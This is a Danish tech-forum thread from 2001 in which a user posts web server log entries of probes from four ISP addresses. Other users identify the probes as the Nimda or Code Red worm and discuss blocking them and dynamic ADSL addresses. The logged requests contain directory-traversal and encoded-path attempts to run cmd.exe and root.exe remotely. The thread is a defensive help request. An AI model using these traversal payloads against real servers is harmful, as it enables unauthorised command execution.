Søg
Avatar billede hojben Novice
27. december 2001 - 14:46 Der er 23 kommentarer og
1 løsning

Sæt en stopper for deres LORT !!!

80.62.84.34
80.62.76.77
80.62.78.227
80.62.58.77

Ovenstående ipnumre ER meldt til både politiet og Teledanmark for nedenstående forsøg... Men kan jeg ikke spære for deres ipnumre?? Jeg sidder i øjeblikket på en win98 med pws (ikke mit)!!

80.62.58.77 - - [27/Dec/2001:14:35:04 +0100] \"GET /scripts/root.exe?/c+dir HTTP/1.0\" 404 632
80.62.58.77 - - [27/Dec/2001:14:35:04 +0100] \"GET /MSADC/root.exe?/c+dir HTTP/1.0\" 404 632
80.62.58.77 - - [27/Dec/2001:14:35:04 +0100] \"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 632
80.62.58.77 - - [27/Dec/2001:14:35:05 +0100] \"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 632
80.62.58.77 - - [27/Dec/2001:14:35:05 +0100] \"GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 632
80.62.58.77 - - [27/Dec/2001:14:35:05 +0100] \"GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 632
80.62.58.77 - - [27/Dec/2001:14:35:05 +0100] \"GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 632
80.62.58.77 - - [27/Dec/2001:14:35:06 +0100] \"GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 500 0
80.62.58.77 - - [27/Dec/2001:14:35:06 +0100] \"GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 500 0
80.62.58.77 - - [27/Dec/2001:14:35:07 +0100] \"GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 632
80.62.58.77 - - [27/Dec/2001:14:35:07 +0100] \"GET /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 632
80.62.58.77 - - [27/Dec/2001:14:35:07 +0100] \"GET /scripts/..\\../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 632
80.62.58.77 - - [27/Dec/2001:14:35:07 +0100] \"GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 632
80.62.58.77 - - [27/Dec/2001:14:35:08 +0100] \"GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 632
80.62.58.77 - - [27/Dec/2001:14:35:08 +0100] \"GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 632
80.62.58.77 - - [27/Dec/2001:14:35:09 +0100] \"GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 632
Avatar billede otis Nybegynder
27. december 2001 - 14:47 #1
LOL; det er jo code red :/.. det er bare en virus på deres maskine, intet med hacking at gøre :)
Avatar billede hojben Novice
27. december 2001 - 14:47 #2
alle 4 ip\'er har forsøgt det samme som ovenstående.. og jeg kan dog se at de ikke er kommet videre (404 og 500)

men kan man ikke programmere sig ud af det??
Avatar billede prodic Mester
27. december 2001 - 14:48 #3
Det er desværre ikke så alvorligt som det lyder - det NIMDA der forsøger at skaffe sig adgang til din PC.

Og vekommende ved det garanteret ikke selv.
Avatar billede hojben Novice
27. december 2001 - 14:49 #4
ved nu ikke om det er desværre ;) men kan man ikke gøre noget på win98+pws så den skrider igen?
Avatar billede otis Nybegynder
27. december 2001 - 14:49 #5
nimda, eller code red.. hmm wtf en af dem ;)
Avatar billede otis Nybegynder
27. december 2001 - 14:50 #6
du kan vel fixe dig en linux server og sætte nogen ipchains op, det ved man hvad er :/
Avatar billede otis Nybegynder
27. december 2001 - 14:50 #7
ellers kan du vel noget med dit smarte m$ program :/
Avatar billede hojben Novice
27. december 2001 - 14:51 #8
hehe fik en mail som redegjorde for det...

-------------------------------------------------
Tak for din henvendelse.

Der er tale om, at en (eller mere sandsynligt, flere) TDC Tele Danmark Bredbånd kunder er ramt af Nimda-ormen).
Det korrekte kontaktpunkt for IP-adresser der anvendes til dette produkt er abuse@post.tele.dk

Vi har videresendt dine i alt 3 henvendelser hertil.

Best regards / med venlig hilsen

Jan Krogh Jensen
CSIRT.DK - TDC Computer Security Incident Response Team
mailto:csirt@csirt.dk
Phone: +45 8937 6948
Web: http://www.csirt.dk
-----------------------------------------------
Avatar billede microtec Nybegynder
27. december 2001 - 14:52 #9
Det får du svært ved. Manden skifter jo åbenlyst IP-adresse hver gang han starter sin PC. Alle de oplyste IP-adresser bruges af ADSL-kunder hos TDC.

Du er nød til at udelukke alle TDC ADSL-kunder, hvis du vil undgå at ham. Næste gang han booter sin PC få han en ny IP :o(
Avatar billede hojben Novice
27. december 2001 - 14:52 #10
otis > nu ikke så M$ hadsk ;)
Avatar billede otis Nybegynder
27. december 2001 - 14:53 #11
hojben, det er ik sundt :/
Avatar billede hojben Novice
27. december 2001 - 14:53 #12
ADSL = dynamisk ??
Avatar billede microtec Nybegynder
27. december 2001 - 14:54 #13
Hvorfor får jeg aldrig så mange indlæg i løbet af 5 minutter når jeg stiller et spørgsmål *gg*
Avatar billede otis Nybegynder
27. december 2001 - 14:55 #14
for nogen TDC kunder, er det dhcp servere der styrer routeren, hvis den bliver slukket bliver den tildelt en ny ip
Avatar billede otis Nybegynder
27. december 2001 - 14:55 #15
microtec, bare sig noget godt om m$ så skal jeg nok være der ;)
Avatar billede hojben Novice
27. december 2001 - 14:56 #16
okay.. min kæreste har da ellers fast IP.. men så blev jeg da så klogere...

//Tak
Avatar billede microtec Nybegynder
27. december 2001 - 14:56 #17
hojben >> Jeps, ADSL = dynamisk.
Det har en del TDC-kunder (og andre). TDC ville tidligere ikke have at prvat-kunder skulle have mulighed for serverdrift på deres ADSL, derfor dynamisk IP.
Købte deres PRO ADSL af samme årsag.
Avatar billede hojben Novice
27. december 2001 - 14:58 #18
oki... nice 2 know...
Avatar billede yeti Nybegynder
27. december 2001 - 15:03 #19
Du kan evt. også prøve med et spm. hos Safe2Day.dk (http://www.safe2day.dk/kb.php) Hvis der ikke er nogen der kender svaret tilbyder safe2day.dk at løbe med bolden og skaffe dig et svar.

//Yeti
Avatar billede hojben Novice
27. december 2001 - 15:08 #20
svaret er jo givet.. men tak for kommentaren
Avatar billede prodic Mester
27. december 2001 - 15:09 #21
Det kan lade sig gøre, at få fast IP hos TDC - hvis vi snakker om TDC Bredbånd.
Hvis ikke - så har de klokket i det hos mig. Mit IP er fast og har altid været det.
Avatar billede hojben Novice
27. december 2001 - 15:11 #22
nemli.. :) min kæreste har ikke en dyt forstand på det med IPadresser og har altid haft fast IP..
Avatar billede microtec Nybegynder
27. december 2001 - 15:14 #23
prodic >> Ja, det kan det nu. Sådan var det ikke for et år siden.
Avatar billede prodic Mester
27. december 2001 - 15:19 #24
Micro->Måske - bor så langt ude, at ADSL kun har været her i 3/4 år - så du har nok ret.
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
Se alle it-kurser fra Computerworld Kurser
IT-kurser om Microsoft 365, sikkerhed, personlig vækst, udvikling, digital markedsføring, grafisk design, SAP og forretningsanalyse.
Se alle it-kurser

Flere spørgsmål fra Andet sikkerhed kategorien

Titel Indlæg Oprettet Seneste aktivitet
hvilken afløser kan I anbefale? Af jcr18 i Andet sikkerhed 5 17/03/202610:32 18/03/202615:36
Advarsler om datalæk for nogle apps Af nu_igen i Andet sikkerhed 6 02/02/202614:54 03/02/202613:45
Mail fra Yousee ? Svindel? Af nu_igen i Andet sikkerhed 4 13/01/202617:27 14/01/202609:36
Er det sandsynligt, at jeg har været udsat for phishing Af Slettet bruger i Andet sikkerhed 4 13/11/202515:09 14/11/202510:45
Google fake Af johp i Andet sikkerhed 3 27/10/202516:31 28/10/202506:52
Se alle spørgsmål i kategorien Opret spørgsmål

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Opret Log ind

Du kan også logge ind via nedenstående tjenester

Alle kategorier på Eksperten
Seneste spørgsmål Seneste aktivitet
I går 17:35 Kan ikke resette PC med Windows 8.1 Af TTA i Office & Kontorpakker
I går 13:33 Lukning af Microsoftkonto Af ErikHg i Windows
23/0416:10 Bat file. Af johnnylassen i Andet programmering
23/0410:28 “Signe” Svindel omtalt i medier Af nu_igen i Mobiltelefoner
22/0420:59 RAID controller virker ikke ved tilslutning af alle 4 harddiske Af Strawberry i Andet hardware
White papers
Flere white papers »